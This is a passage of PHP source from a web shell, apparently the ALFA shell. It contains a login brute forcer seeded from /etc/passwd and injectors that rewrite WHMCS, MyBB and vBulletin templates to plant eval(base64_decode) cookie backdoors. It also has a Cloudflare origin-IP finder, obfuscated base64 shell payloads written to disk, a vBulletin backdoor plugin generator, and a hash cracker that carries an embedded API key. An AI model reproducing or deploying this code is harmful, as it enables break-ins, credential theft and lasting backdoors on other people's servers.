echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
echo '</select> Protocol: <select id="protocol" name="protocol">';
foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
$port = $_POST['alfa2'];
$usernames= $_POST['alfa3'];
$passwords = $_POST['alfa4'];
$fcrack = $_POST['alfa5'];
$cracking = $_POST['alfa6'];
$protocol = $_POST['alfa7'];
$loginpanel = $_POST['alfa8'];
$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
if($cracking=='start'){
echo __pre();
$exuser = explode("\n",$usernames);
$expw = explode("\n",$passwords);
foreach($exuser as $user){
foreach($expw as $pw){
$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
Alfa_Call_Function_Cracker($loginpanel,$array);
}
}
echo '<br><font color="red">Attack Finished...</font>';
}
echo '</div>';
alfafooter();
}
function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
function alfaShellInjectors(){
alfahead();
echo '<div class=header>';
AlfaNum(11);
echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
AlfaNum();
echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = "{php}".ALFA_UPLOADER.";{/php}";
$newin = str_replace("'","\'",$index);
$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('[email protected]')";
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version') && $method == 'auto'){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&[email protected]");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert("shell injectet...");
$ff= 'http://'.$path."/solevisible.php";
output($ff);}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>[email protected]</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
AlfaNum(1,2,3,5);
echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
";
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type=submit value=' '></p></form></center></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$method = $_POST['alfa4'];
$shellCode = "{\${".ALFA_UPLOADER."}}";
$newinshell = str_replace("'","\'",$shellCode);
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$inject = "select template from {$prefix}templates where title= 'calendar'";
$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
$GetTemp = mysqli_fetch_assoc($result);
$saveDate = $GetTemp['template'];
$repsave = str_replace($shellCode,"",$saveDate);
$repsave = str_replace("'","\'",$repsave);
$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
$geturl = "select value from {$prefix}settings where name= 'bburl'";
$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
$rowb = mysqli_fetch_assoc($findurl);
$furl = $rowb['value'];
$realurl = parse_url($furl,PHP_URL_HOST);
$realpath = parse_url($furl,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/calendar.php");
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/calendar.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
}}}}
if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
AlfaNum(1,2,7,9,10);
echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
$table = array('td1' =>
array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
'td2' =>
array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
'td3' =>
array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
'td4' =>
array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
'td5' =>
array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo '<p><input type="submit" value=" " /></p></form></center>';
if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
$method = $_POST['alfa8'];
$faq_name = "faq";
$faq_file = "/faq.php";
$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
if(empty($savetoass)){
  $faq_name = "header";
  $faq_file = "/";
  $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
  $recivedata = @mysqli_query($conn,$rec);
  $getd = @mysqli_fetch_assoc($recivedata);
  $savetoass = $getd['template'];
  $code = ALFA_UPLOADER.";";
}
$code = str_replace("'","\'",$code);
$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
$getval = @mysqli_fetch_assoc($geturl);
$saveval = $getval['value'];
if($faq_name == "header"){
  if(substr($saveval, -5, 5) == "/core"){
    $saveval = substr($saveval, 0, -5);
  }
}
$realurl = parse_url($saveval,PHP_URL_HOST);
$realpath = parse_url($saveval,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
@fclose($fsock);
}
}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath.$faq_file);
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath.$faq_file;
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
echo '</div>';
alfafooter();
}
function alfacheckfiletype(){
  $path = $_POST['path'];
  $arg = $_POST['arg'];
  if(@is_file($path.'/'.$arg)){
    echo("file");
  }else{
    echo("dir");
  }
}
function alfacheckupdate(){
  if($GLOBALS["DB_NAME"]["cgi_api"]){
    if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){
      _alfa_cgicmd("whoami","perl",true);
      if(strlen(alfaEx("whoami",false,true))>0){
        __alfa_set_cookie("alfa_canruncmd", "true");
      }
    }
  }
  if(function_exists("curl_version")){
    $update = new AlfaCURL();
    $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
    $json = @json_decode($json,true);
    $data = array();
    if($json){
      if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){
        if($json["type"] == "update"){
          if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
            @setcookie("alfa_checkupdate", "1", time()+86400);
            $data["content"] = '<div class="update-holder">'.$json["content"].'</div>';
          }
        }
      }
      if(isset($json["ads"]) && !empty($json["ads"])){
        $data["content"] .= $json["ads"];
      }
      if(isset($json["copyright"]) && !empty($json["copyright"])){
        $data["copyright"] = $json["copyright"];
      }
      if(isset($json["solevisible"]) && !empty($json["solevisible"])){
        $data["solevisible"] = $json["solevisible"];
      }
      if(isset($json["code_name"]) && !empty($json["code_name"])){
        $data["code_name"] = $json["code_name"];
        $data["version_number"] = __ALFA_VERSION__;
      }
      if(isset($json["market"]) && !empty($json["market"])){
        $data["market"] = $json["market"];
      }
      echo @json_encode($data);
    }
  }
}
function alfaWriteTocgiapi($name, $source){
  $temp = "";
  $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
  if(in_array($name, $not_api)){
    $temp = ALFA_TEMPDIR;
    if($temp){
      @chdir($temp);
    }
  }else{
    alfaCreateParentFolder();
    @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  }
  @mkdir('alfacgiapi',0755);
  __write_file("alfacgiapi/".$name, __get_resource($source));
  @chmod("alfacgiapi/".$name, 0755);
  return $temp;
}
function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
function alfaupdateheader(){
  if(!isset($_COOKIE["updateheader_data"])){
    $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
    $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
    $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
    $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
    if(@is_array(@json_decode($data,true))){
      __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
      echo $data;
    }
  }else{
    echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
  }
}
function alfassiShell(){
alfahead();
echo '<div class=header>';
alfaCreateParentFolder();
@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
@mkdir('alfa_shtml',0755);
@chdir('alfa_shtml');
alfacgihtaccess('shtml');
$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
@__write_file('alfa_ssi.shtml',__get_resource($code));
@chmod("alfa_ssi.shtml",0755);
echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
echo '</div>';
alfafooter();
}
function alfacloudflare(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$url = $_POST['alfa1'];
if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
$url = preg_replace('/^(https?):\/\//', '', $url);
$url = "http://www.".$url;
}
$headers = @get_headers($url, 1);
$server = $headers['Server'];
$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
$url = explode($matches[0], $url);
$url = $url[1];}}
if(is_array($server))$server = $server[0];
echo __pre();
if(preg_match('/cloudflare/i', $server))
echo "\n[+] CloudFlare detected: {$server}\n<br>";
else
echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
echo "[+] Searching for more IP addresses.\n\n<br><br>";
for($x=0;$x<count($subs);$x++){
$site = $subs[$x] . $url;
$ip = is_ipv4(gethostbyname($site));
if($ip == '(Null)')
continue;
echo "Trying {$site}: {$ip}\n<br>";
}
echo "\n[+] Finished.\n<br>";
}
echo '</div>';
alfafooter();
}
function is_ipv4($ip){
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s){
echo '<center>'.__pre().$s.'</center>';
}
function create_table($data){
echo '<table border="1">';
foreach ($data as $key => $val){
$array = array();
foreach($val as $k => $v){
$array[$k] = $v;
}
echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
}
echo '</table>';
}
function alfaphp2xml(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
<input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
echo '</textarea></center></p>';
}
echo '</center></div>';
alfafooter();
}
function alfacpcrack(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
if($_POST['alfa1']=='dec'){
$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$hash_type = $_POST['alfa4'];
$email = "[email protected]";
$code = "7b9fa79f92c3cd96";
$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
$resp = @file_get_contents($target);
if($resp==''){
$get = new AlfaCURL();
$resp = $get->Send($target);
}
echo __pre().'<center>';
switch($resp){
  case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
  case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
  case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
  case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
}
if(substr($resp,0,4)!='CODE'&&$resp!=''){
echo "<b>Result: <font color='green'>".$resp."</font></b>";
}elseif(substr($resp,0,4)!='CODE'){
echo "<font color='red'>NoT Found</font><br />";
}
echo('</center>');
}
}
}
if($_POST['alfa1']=='analyzer'){
echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$curl = new AlfaCURL();
$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
echo(__pre().'<center>');
if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
  echo('<font color="green">'.$s[1].'</font>');
}else{
  echo('<font color="red">Not Found...!</font>');
}
echo('</center><br>');
}
}
}
echo '</div>';
alfafooter();
}
function alfafooter(){
if(!isset($_POST['ajax'])){
echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>
<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
